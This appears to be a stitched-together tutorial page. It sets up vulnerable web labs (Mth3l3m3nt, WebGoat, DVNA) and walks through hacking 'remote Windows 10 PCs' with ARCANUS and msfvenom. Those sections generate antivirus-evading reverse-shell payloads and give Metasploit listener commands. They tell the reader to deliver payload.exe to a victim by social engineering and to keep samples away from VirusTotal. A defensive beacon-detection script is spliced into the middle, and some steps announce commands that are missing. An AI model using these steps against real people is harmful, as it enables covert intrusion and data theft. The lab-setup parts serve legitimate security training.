Setup Web Penetration Testing Lab using OWASP Mth3l3m3nt Framework

OWASP Mth3l3m3nt Framework is a penetration-testing aid and exploitation framework. Mth3l3m3nt lets you build and run custom LFI and RFI exploits quickly with little or no effort. It also lets you keep track of your quick wins through its ability to manage HTTP bots: say no to runaway web shells and yes to centrally managed herds in large penetration testing engagements.

The purpose of this project is to provide a platform for more flexible testing, especially of web security and the OWASP Top 10 threats to web applications. Being web based, it allows free and open source collaboration, and it is intended to make offensive security work on the web easier and more efficient by leveraging existing technologies with few dependencies. It is built purely on open source components, and the goal is to grow it into a fully-fledged web penetration testing framework that lets users add exploits for new vulnerabilities in minutes. The features it currently offers are:

· Multi-Database Support (JIG, SQLite, MySQL, MongoDB, PostgreSQL, MSSQL)
· LFI/RFI Exploitation Module
· Web Shell Generator (ASP, PHP, JSP, JSPX, CFM)
· Payload Encoder and Decoder
· Custom Web Requester (GET/HEAD/TRACE/OPTIONS/POST)
· Web Herd (HTTP bot tool to manage web shells)
· Client Side Obfuscator
· String Tools
· Whois



Download WAMP server here. Select Save or Run, then click Open. After that, follow the next steps.


Next you will see the Select Destination Location screen. Click Next to continue.


Next you will see the Ready to install screen. Click Install to continue.


Once the files are extracted, you will be asked to select your default browser. Select your default browser’s .exe file, then click Open to continue.



Once the progress bar is completely green, the PHP Mail Parameters screen will appear. Leave the SMTP server as localhost, and change the email address to one of your choosing. Click Next to continue.


Download the latest version of the software from the GitHub repository: https://github.com/alienwithin/OWASP-mth3l3m3nt-framework

Extract the Mth3l3m3nt archive to the location C:\wamp\WWW\Mth, as shown below.



Now find the data folder in the framework's folder options.


Now, the first thing to do is to give the folders the right permissions: right-click on them and change the attributes.


Now open the .htaccess file and add RewriteBase /Mth on line 8.


Next, load the site by entering http://localhost/Mth in the address bar.

The default credentials are:

username: mth3l3m3nt
password: mth3l3m3nt

Web Penetration Lab Setup using WebGoat in Kali Linux

WebGoat is a deliberately insecure web application maintained by OWASP and designed to teach web application security lessons. You can install it and practice with it. There are other 'goats' such as WebGoat for .NET. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application aims to provide a realistic teaching environment, giving users hints and code to further explain the lesson.

First download WebGoat from here and unzip WebGoat-OWASP_Standard using the following command:


p7zip -d WebGoat-OWASP_Standard-5.3_RC1.7z


Now go to the WebGoat folder. You will need to start/stop WebGoat as root:

sh webgoat.sh start8080


Start your browser and browse to http://localhost:8080/WebGoat/attack (port 8080 matches the start8080 command above).
Log in as:
user = guest,
password = guest


Hack Remote Windows 10 PC using ARCANUS (Bypass All Antivirus)


ARCANUS is a customized payload generator/handler for penetration testing only.

WHY USE ARCANUS?
· In the pentest world Metasploit is the mainstream tool for this job, but ARCANUS has a few advantages.
· ARCANUS generates a unique payload for Windows and Linux systems that can't be detected with any antivirus programs. (Don't give any samples to VirusTotal or similar web sites to keep it that way ;D )
· It has extra modules for exploitation. Ordinary reverse shell payloads offer only remote access to a command prompt, but ARCANUS has a few special commands like "£persistence, £download, £upload, £meterpreter..."
· It is silent and continuous. Metasploit payloads attempt to connect to the remote host only once, but ARCANUS payloads make a connection attempt every 5 seconds, silently in the background.
· It is flexible. If you want to use it with Metasploit, it has a meterpreter module for executing meterpreter shellcode on the remote machine.
· Platform independent! ARCANUS works on both Windows and Linux.
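The 5-second reconnect loop described above is also what makes such a payload visible to a defender: a flow that retries the same host and port at a fixed interval stands out in connection logs. The following Python script is an added example, not code from the original post or from the ARCANUS project; it parses constructed firewall-style connection records (the format, the sample addresses and the thresholds are assumptions) and flags flows whose gaps between attempts are nearly constant.

```python
from collections import defaultdict
from datetime import datetime
from statistics import pstdev

# Constructed sample records (not from the page): "<ISO timestamp> <src> <dst> <dport> <outcome>".
# The first flow retries the handler port every 5 seconds; the second is ordinary browsing.
SAMPLE_LOG = """\
2024-01-01T10:00:00 10.0.0.5 192.168.0.140 4444 SYN_FAIL
2024-01-01T10:00:05 10.0.0.5 192.168.0.140 4444 SYN_FAIL
2024-01-01T10:00:10 10.0.0.5 192.168.0.140 4444 SYN_FAIL
2024-01-01T10:00:15 10.0.0.5 192.168.0.140 4444 SYN_FAIL
2024-01-01T10:00:20 10.0.0.5 192.168.0.140 4444 SYN_FAIL
2024-01-01T10:00:03 10.0.0.7 203.0.113.10 443 ESTABLISHED
2024-01-01T10:01:41 10.0.0.7 203.0.113.10 443 ESTABLISHED
2024-01-01T10:04:09 10.0.0.7 203.0.113.10 443 ESTABLISHED
2024-01-01T10:04:30 10.0.0.7 203.0.113.10 443 ESTABLISHED
2024-01-01T10:09:02 10.0.0.7 203.0.113.10 443 ESTABLISHED
"""

def parse_log(text):
    """Return (timestamp, src, dst, dport) tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[3].isdigit():
            events.append((datetime.fromisoformat(parts[0]),
                           parts[1], parts[2], int(parts[3])))
    return events

def find_beacons(events, min_attempts=5, max_jitter=1.0):
    """Flag flows whose gaps between attempts are nearly constant (population
    std dev <= max_jitter seconds). Returns {flow: mean interval}; thresholds are assumed."""
    flows = defaultdict(list)
    for ts, src, dst, dport in events:
        flows[(src, dst, dport)].append(ts)
    suspicious = {}
    for flow, stamps in flows.items():
        if len(stamps) < min_attempts:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if pstdev(gaps) <= max_jitter:
            suspicious[flow] = sum(gaps) / len(gaps)
    return suspicious

if __name__ == "__main__":
    for (src, dst, port), interval in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(f"possible beacon: {src} -> {dst}:{port} every {interval:.1f}s")
```

On real data, raise min_attempts and tune max_jitter to the clock resolution of your log source, since a short-lived burst of retries from a legitimate client can look periodic too.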

Open your Kali Linux terminal and type the following command:




Open a terminal, type ./ARCANUS and press Enter to continue.

Now it will ask for your choice; press 2. A pop-up will open; press Enter.


Now enter the IP address of your Kali Linux PC and press Enter. In the next step it will ask for a port number; enter one such as 4444 and press Enter.


It will save a file named payload.exe. Now send the exe file to the victim using any social engineering technique.



Click the “Choose File” button, navigate to payload.exe and double-click it. It appears in the “Choose File” box, as shown below:


Now when the victim opens payload.exe you get access to a Windows command prompt. Running systeminfo in the prompt tells you all you need to know about the target system.


When we need to retrieve a file from the target we use the download command:

£download “Filename” /root/Your Path


For more commands visit here.

Exploit Windows 10 PC using msfven.sh Script

Open your Kali Linux terminal and type the following command:


git clone https://github.com/wayneaswilliams/msfvenom_custom_encoding.git


Now type the following command to create the payload:

./msfven.sh

Now enter the IP address of your Kali Linux PC and press Enter. In the next step it will ask for a port number; enter one such as 4445 and press Enter.

In the next step choose a payload, e.g. windows/meterpreter/reverse_tcp, and press Enter.



It will produce a file named tcp_445.exe. Now send the exe file to the victim using any social engineering technique.


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully. The listener port must match the port chosen when the payload was generated (4445 above), since the handler otherwise defaults to 4444:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.140
set lport 4445
exploit

Now send the exe file to the victim using any social engineering technique. When the victim runs the exe you will get a Meterpreter session on the victim's PC.

Web Hacking Lab Setup using DVNA in Kali Linux

Damn Vulnerable Node Application (DVNA) is a Node.js web application that is damn vulnerable. Its intended purpose is to teach secure coding concepts to web developers who use Node, and to explore web application vulnerabilities in a controlled class environment or to serve as a cyber range for capture the flag events. It's loaded with common web vulnerabilities and various levels of complexity.

Open your Kali Linux terminal and type the following command:


sudo apt-get install git


Now type:

wget -qO- https://raw.github.com/creationix/nvm/master/install.sh | sh

source ~/.bashrc


Next, type:
nvm install 5.3.0
nvm use 5.3.0
git clone https://github.com/quantumfoam/DVNA.git
cd DVNA/
npm set progress=false


In the next step type:



Now type:

node dvna.js


Navigate to http://localhost:3000/ in your browser to reach the DVNA lab.